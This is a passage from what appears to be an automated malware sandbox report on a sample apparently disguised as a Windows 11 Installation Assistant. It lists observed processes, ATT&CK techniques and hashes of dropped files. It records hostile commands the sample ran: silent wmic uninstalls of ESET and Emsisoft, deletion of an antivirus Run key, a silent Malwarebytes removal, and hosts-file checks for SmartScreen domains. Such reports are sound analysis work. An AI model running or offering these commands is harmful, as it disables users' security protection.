        Command: find /c /i "nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
    [3] C:\Windows\system32\find.exe (PID 1572)
        Command: find /c /i "safebrowsing.googleapis.com" "C:\Windows\system32\drivers\etc\hosts"
    [3] C:\Windows\system32\find.exe (PID 2716)
        Command: find /c /i "ars.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
    [3] C:\Windows\system32\find.exe (PID 2932)
        Command: find /c /i "apprep.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
    [3] C:\Windows\system32\find.exe (PID 2640)
        Command: find /c /i "c.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
    [3] C:\Windows\system32\find.exe (PID 2780)
        Command: find /c /i "feedback.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
    [3] C:\Windows\system32\find.exe (PID 1908)
        Command: find /c /i "ping.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
        - System Network Configuration Discovery: Internet Connection Discovery
    [3] C:\Windows\system32\find.exe (PID 2368)
        Command: find /c /i "ping.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
        - System Network Configuration Discovery: Internet Connection Discovery
    [3] C:\Windows\system32\find.exe (PID 2664)
        Command: find /c /i "t.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
    [3] C:\Windows\system32\find.exe (PID 2588)
        Command: find /c /i "t.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
    [3] C:\Windows\system32\find.exe (PID 864)
        Command: find /c /i "t.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
    [3] C:\Windows\system32\find.exe (PID 1496)
        Command: find /c /i "unitedstates.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
    [3] C:\Windows\system32\find.exe (PID 2928)
        Command: find /c /i "unitedstates.smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
    [3] C:\Windows\system32\find.exe (PID 572)
        Command: find /c /i "urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
    [3] C:\Windows\system32\find.exe (PID 1916)
        Command: find /c /i "urs.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
    [3] C:\Windows\system32\find.exe (PID 2968)
        Command: find /c /i "slscr.update.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
    [3] C:\Windows\System32\Wbem\WMIC.exe (PID 1900)
        Command: wmic product where name="ESET Security" call uninstall /nointeractive
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\Wbem\WMIC.exe (PID 2304)
        Command: wmic product where name="Emsisoft Anti-Malware" call uninstall /nointeractive
    [3] C:\Windows\system32\reg.exe (PID 2776)
        Command: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "emsisoft anti-malware" /f
    [3] C:\Windows\system32\cmd.exe (PID 2640)
        Command: cmd /c "C:\Program Files\Malwarebytes\Anti-Malware\mbuns.exe" /uninstall /verysilent /f
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:876
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241114235820.log C:\Windows\Logs\CBS\CbsPersist_20241114235820.cab1⤵
- Drops file in Windows directory
PID:2688
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:1504
Network
MITRE ATT&CK Enterprise v15

Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Create or Modify System Process (1)
  - Windows Service (1)

Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Direct Volume Access (1)
- File and Directory Permissions Modification (1)
- Hide Artifacts (2)
  - Hidden Files and Directories (2)
- Impair Defenses (3)
  - Disable or Modify Tools (3)
- Indicator Removal (2)
  - File Deletion (2)
- Modify Registry (3)
Downloads

Filesize: 29KB
MD5: a69e54b63a067cefab41736717e9348b
SHA1: 96e00b5f3170d19d173e62b97c1691fac8edfb98
SHA256: c72184932dd0541095be4827e5f86b3db735cfc651f04b50a1cc783d9037d75d
SHA512: 13385b98377cb664907a5189cbf63f575c86b5b705df2a458ae21c6fd63f6cbf77451e8f17b22af8921a3342f31445278cb8450e1cc58fe33eecffe81e56cdda

Filesize: 29KB
MD5: c857a930b241455b7961a16c96ddf256
SHA1: 40f6df790dc7bc1e7daa1f48a729453a2ffd9efa
SHA256: b2023c405900d194c0a00ea1cabefa96f3abcb73c2da88c3802594811a128bbc
SHA512: 702b4c9327cddd5d8baac050376143e42ac4632afb0e1b605a0d3a7d448a9f570296981b509f66cab56926a6c52bb8fd90b6014a89d433e3b8f41396b6fe7bcb

Filesize: 11KB
MD5: c87a407a6decc862e3132efc8ab504c9
SHA1: 20cd713fa491119aabfd25a7cce7a8209098f903
SHA256: 439de9f662754bbcfc211658ce3f1c1730e85df199ed1e067940e28831d2c758
SHA512: 8bed0ca582ca5b46f0c6922995343388df0d84d063512308d3f58c31da1811cb2c47b87be0ce5de4a1fb8ce14f89f8f3197f31bb0ca989fa159514f6751e1832

Filesize: 10KB
MD5: bdb4dcbcec51d9ee1afee83221921fee
SHA1: 21d56a9334238297d1a09aba46043cc36c9e2d3c
SHA256: 9e5d8505b986e40cce00707180334fead34c0c3b590c458305de89e4bbc85f75
SHA512: cad20e6355cfe1e42a4ee7f5350a033ec79b8ed2689d8c6fa11bb1c3ae2a99425f03d95312ed9daf5c2543fc7ce38239fca41700cbecbc02a007a669ffd81fa5

Filesize: 5KB
MD5: 3886aae8ae30f288363ce4d2ac4f81c2
SHA1: 19441c886b57ed9f4650f614f0d93501d0a33e40
SHA256: 37f10f3d46a2886cac6169a398e91dd8cd0cfd06a7b6812e1afb68c4c031b9fd
SHA512: b37aa26a5324723d9b8a7b919c3727565a1e1974ba1316093b59dbe4a75f5e0773288894d7abb403d65688e0e3f29ef4b48af7a8048e64fe36199bf8d371fb31

Filesize: 520B
MD5: 6f0d036f6681bac6fd742591ddc62808
SHA1: 2e518c19ec29b7a3a69cd9d4c120d3b88d71102b
SHA256: ce8f0822d428e39157fc6ed433b8da7fa7ce62ece2c73bed9930d50f7cb41f24
SHA512: 8aeb47d8a15ab62a1a6e23f93a916f361703d2ac64a302d2364d40de016dc2167d653ca905197d81e4c578fdbb81eb88a22c7cd81abe08756ec86dda6a44aaf6

Filesize: 748B
MD5: 22a845995279c76177c613100a58d134
SHA1: 5cc94610bcdba7b0d514b711852a6cdb56db3ae1
SHA256: ca30adad79ccd83b3dc79f26a58c1552559176f8a271237c6d4d7ccf307920c0
SHA512: 0a4a3eb765847ab66e847bb83202ee8ad5d8591659a8be9e3ed4b6863f3aac28f9d4f6e2d4ca5c5efe800cfe30d471122b2f96807c2735dde5c6ade16c064cad

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk
Filesize: 1KB
MD5: 759759e2720dbe15d074eec781955674
SHA1: ba1eafb270051bad0edada4ecb930e9a800c12ca
SHA256: 87099c8f93e7e21a823dbde41971c233209abc9877c20134464dfe670a7ad211
SHA512: dffbf9982ac19cab3f07bb5c7d7b62e2aecb4d620c6b2dae4aab8865d2bf27aafa1556ef59131751b2a444e8f7b8dbbc78ba6ba7ea796ced87ab0a9a44fc8596

Filesize: 2.2MB
MD5: e775f2973a362cfde5005d66e42bd39d
SHA1: 1a0303ceed6ede89b3e3c27beae948cdd397ef94
SHA256: 5ff0dce7768f46dce91af724cdbbc885761db1c8922f3e95fa36d6fbdcf142fb
SHA512: 175dbd541c3e084e5d34762f884d6759eaca721b05308fc9d51b457863ff5b199b2f6efb0183ea7ec18af504b3310a95d1893075f1b57a9ea7a46ee1792ae0e3

Filesize: 29KB
MD5: 31c5a8d7f0d900bfff09d437a7457478
SHA1: c32f7abbc47949c340a2136bb8cc4787f05b1eff
SHA256: 89da44ebaa36a31740f9dbc585cefc3f55cf725f7d8d745b44ba259f0a1d8455
SHA512: 0089a7e5e0c3d7b8a226775f30983e901b323846d5263366672390ebbbd9212bd72bdb87c7baeeb09c6438317a66f5ccfc20cd898579190e6bb7579dd1cd158a

Filesize: 1KB
MD5: 84e977761b7f9011feb9296566d27a38
SHA1: 0bdbab50c1401b68f18085e73fa27d2148d38d6a
SHA256: 001e88839eeb5b026cefe2e048d39e581d43d564067caed4a6ff4f147cd8395c
SHA512: 9bd2a7e559567aa951b3e10c496a19f796a0ad879fe91886cd36c169a3efd71fecbad3036c540c4e5f5da17ba090e6b84ec69e5fe22446d0f3563298a7571d03

Filesize: 1KB
MD5: ef39c97b88adcf24f9d75d036a4d0e35
SHA1: a967da66a057bf2521739b5d61cd07ce1084195a
SHA256: c9466b8bc2571ebd353e84485192d2d9021e6d759c84599145afff73dece5956
SHA512: 510d404a4f4cdd89d144575ffaae9f48f31d3446a9eea6541b8f95ce2f555fab618a0314f9403ff74898d7d4e35592dc2553774926e9ce8255aceef09679b2f7

Filesize: 1KB
MD5: a348b69e3a366a07e1a1651600151eb3
SHA1: 49c0212e9088d91c6689cedc1b91fa6b062dcd0e
SHA256: c183869d9a0ed88e0f4edf9624859c653ea0bb458d6c4be2ef798aedd3ddfa79
SHA512: 2bc5676a297a3e9e1eafb759bc5fefc81fbb019df2e3e2f218bf8f42c65ff6f3592f6a7324c96f7772feb0cdaf896109ec6ead2c77126f4ed8ec98b0f21c7e93

Filesize: 1KB
MD5: 92da4ee5615831e9c2ecfa75a8937948
SHA1: dfe4429943c88b6609de67ebca3452558f26b39e
SHA256: 2459577877c335500b993422f09863098cdc2936ed7383f7865a1c2344718df2
SHA512: 3df1c1b906bd87c42a23f0724142063c1b8955aef4ab83e7bb13a53d5b228670a92ce9f3c2e6e1c7eda0b2894b2105f85f652f2eda73fb5aba78d7055ee00ca9

Filesize: 1KB
MD5: bb1d44e3eeb99421323697ddf80268f2
SHA1: 8c0e1fd7a3dd015374445201df2d227c4faae8dc
SHA256: e343989aa40afb2faa32b8c4ef58d9fb7b5ffb5157657034de710c176267e8f0
SHA512: 1a5cdc98945141238c9883886dc17a76a91af5a28a80aa0d0267eb3a4cd635645446abbe9ecb5364834b8203fcfd89cd490e8a168d858254aa4a79fb94e95694

Filesize: 1KB
MD5: 831e07ee008a83e89de16108a17bbf35
SHA1: ea9abedbaed2d7590fbb369c5ea69a70696faced
SHA256: 92751d33e76419b8f132b44b52d7a5943ede5025528d82dd60c25d0600c1ce86
SHA512: 86fd31745004cbb587ee05286ab6a82f0560afe6d38372985c484fccc84b53b974aa8459f9bf9edccaa3cc0e62c94f35f6f1619f41df5811e93d7bb62f82ab12

Filesize: 1KB
MD5: 09074950970f5172530696cee2d2909f
SHA1: 8eefdc4845a20233750b94894d07558bfe3bddf2
SHA256: 6e7cbf78872b8d7d40359b13168d2a8eef35b94641788e1014d250e47ed9baab
SHA512: 626554250b64653ec8655a31768b2266b67c0558995831c193f48c3edd8cba2f2b8d2feab721c6dcf994d85bccbfa671e6afec052d43edb37cd3a40717fe4c5b

Filesize: 1KB
MD5: 2713185100af50bb19746cb3404913df
SHA1: db6e5c2e34a949a64857b3a05e04d056ca4938c6
SHA256: a933d949e903e51c5bc3e995972a644c661ac8677ba3a01f8751ec0be6d159cf
SHA512: cdc44b4bf20b78e197890916fab3d35a3682da94b5ceb428798ef621b1f2af3add93eff78265c6d6275ff9dc2ce257a057d821b894e74b41b8f6e601f293232f

Filesize: 1KB
MD5: d3db9a97e008efc224e9297ba165d06d
SHA1: 123e37d74741f285c6aa95b907cc4824b8e43101
SHA256: 34fa0fc06b343e18355ece0b7fc42b2f4436a0fee3fed595daac181bb5a1c69c
SHA512: 6a1fcdaa08540d7540a78d0cb02eacd9063bf9f3e4bb466455a66737b4370ecb0dace99e42a67573976007e3a57d391ad7d1f60742fc100e1a2039add502e692

Filesize: 1KB
MD5: 78e1f2fe0b2d5d8049ac15446ddc1cc6
SHA1: 1d285f441680db734eca44c0271ce32c217a0a90
SHA256: 0e37bc721d56b7835ec11353d1a829c41cf392706994c5ca7a8b2c1c58d9ad95
SHA512: 6afb1f2f30b7b912786aebe1cd0e2a99a58962cde78266d29ca7d5759ff4c660f7b55b7a14d242b92424d58a51956052f7d53d09ecb2486ce2803d2d47b5945c

Filesize: 1KB
MD5: 04b0e63d827ce3191b8f99bb8abc4283
SHA1: db8a653027827468f45fbd03eb9bf30719924331
SHA256: ba291efbeabc18c4fa8d9e67ba7ff13ddae51239d52f17a6422b2925431f836d
SHA512: 8fd1f3e216f32d4bee8388220fe9e681552d64e9e610cf0c8dfcbbaa5e8dce909702d8bae36a3641abeecbda170254e8494fd264f83928cd4dfed33eabffef1c

Filesize: 1KB
MD5: 155a7475326b32c7bdd468fe04c4aa4c
SHA1: 9d67e1b6955d3f41a24c6fcb36ae80c1791ad793
SHA256: fb42544787377f45a916e46f21540f34c7c611199a166ce208bcee48224bc428
SHA512: 4a208afd15316a072375bfd8e5aced3b45bf57f60951f65378c98d545cd75238f0e0491285cf1af5f7b2c8d07d0047fba2576923d4d0df484a0c4e7b0c9c69da

Filesize: 1KB
MD5: d9729daa058204ba66ac42f2a9a55933
SHA1: 2bbfb064f6faa8953e75f90f278a5d41d9b7684f
SHA256: 5f37d596e9d27a2546df161307dcd9f9d4243236c148f54d105291e4b9023d22
SHA512: 44f0468b7d892ca707972c27612d3f25465746c4a3a352b20f68e273577e438857fd62f908cd24fa2c0c8050e554fe5cd99a1b8d25586bc975c3320c2dea02e3

Filesize: 1KB
MD5: 80fd345f8b4645540981b11c722f1059
SHA1: 5b8a1c96ae8dbbe1d609e863686eef2b7beb7344
SHA256: f1ad768f9bb73636fb8299bb07761047f68ed8dcc12e2f60f21cada66bc91521
SHA512: bee9504f71ed9636cf9fe158e9ee41ec23039e8c86c053d9c0d3b8ec0bce19eb36e30706251efd86561fa021be85cff9c78c7836e7868df6f160268a601b7cc7

Filesize: 1KB
MD5: 8c4a3e1a4e72d8674b051a850a3ed938
SHA1: c2dd76a0e9410647df1a48ef4520d09ee6cbfd57
SHA256: 736a3c8377d5eef47a1118eec17c4028fe2c728037d466647a900c8426bbb587
SHA512: 86753980d57748000b6e7660df7fc95cee8ef61e8b0986a30287a03976cf5fd0a75c1fe50cd7d444d046df72f7df6f31c4ae85f862b7509368ad2e5319b8d541

Filesize: 1KB
MD5: 4d21908dc10761543db6275f5f319944
SHA1: 761e7ffec616e8bf42fe491e284f2bef677a26fd
SHA256: 5591db5b4c6fb98ce48007298d5f46ea2a72fcc95a0847212ab9f6266edb9f14
SHA512: d14a9ae9441ba8056a992c474ed6335b30550fa2c34ab2c2cf52532f8d31e64a67a3996808fb519c48dbf9c4624d5551e7ff7fa7378ea30629edaaafb55cb8a9

Filesize: 10KB
MD5: dee7acbdbf3f448057dae93e28514690
SHA1: ae56d802230bc13e7663be388781d7d1aa1ef3d0
SHA256: 5ec9a6efe3c3451a967335bf7d7bcb2f916fc8ba81c0b1118018d079fbffb5ec
SHA512: 77cdd3ab66e49267907e3711ab7878469976ba677a683bead7d5e63353b03164345aef0ca0dd5d124488eca7cfef1f64ebde363d76596ef882cb2c56e1f41504

Filesize: 208B
MD5: 2e2fa9827b9d476133f122be9012408c
SHA1: 3a3d0d1135f95227693a46a110312a3c1a177c51
SHA256: 184fb09c2a02a1e5d23c9abe64affd866a919b7b287622069371716223f3b1b6
SHA512: 2e4a431fca5dada81cb22af865b122635b9b93e89b3948e86a2d6dd0c4b8eadbcf594ea1fb817818738468a831ecac75d7247d226d4ce901a9aaec66bc2c0e89

Filesize: 135KB
MD5: 78c269b72f5b1d9bd4654cef3fb4a986
SHA1: c44db702175e2d474e3221a0de14f01c1f35129b
SHA256: ace03b12b8763bd8567425f288ded8f8f0d9acd62f81de17414bd300d21820ab
SHA512: bc9abf69debc967df59e16491ec533ab59b997d8ea89d7ebc1ba0a04b319d5f3746cd9e22b8b2c10b4ce655fb5a813be08214e142e97107cb07222f7dc19bee5

Filesize: 764KB
MD5: 408dd6ade80f2ebbc2e5470a1fb506f1
SHA1: e00293ce0eb534874efd615ae590cf6aa3858ba4
SHA256: 4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71
SHA512: 4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Filesize: 3.1MB
MD5: 40627c5fe58bb5a60606e5be621af052
SHA1: c21ec14767478d0e4bd1184ad6c2c280e2d1342f
SHA256: bd4cbba2f23b512fad5b0c84d2e9502e4bfea75cac78482d22036968e8224b42
SHA512: e418ed7c9768a4237622be7a53b761a45ca4d4cf37643fcfdf9cb2f200a95fc904b213fb1a37befb86e6ff93ae3c5ff0f39243305789236d4031e017ec99085d

Filesize: 8.0MB
MD5: e9f5799bcca4695afee82c0781242577
SHA1: 240bf1ae93f432aef2a05daeed3299d12bd7e6f8
SHA256: dc24023611f63b84f4fddc095a1417518ae1972743dbbff014d31218770e48d6
SHA512: b1551197efd2209b633ed0ca581332a1871416a541a64ef99dffd75c7a082b65c4fa3abdc15b84ff92cdac224c6616a40c17b33c268df3f6244f0b2c920b143c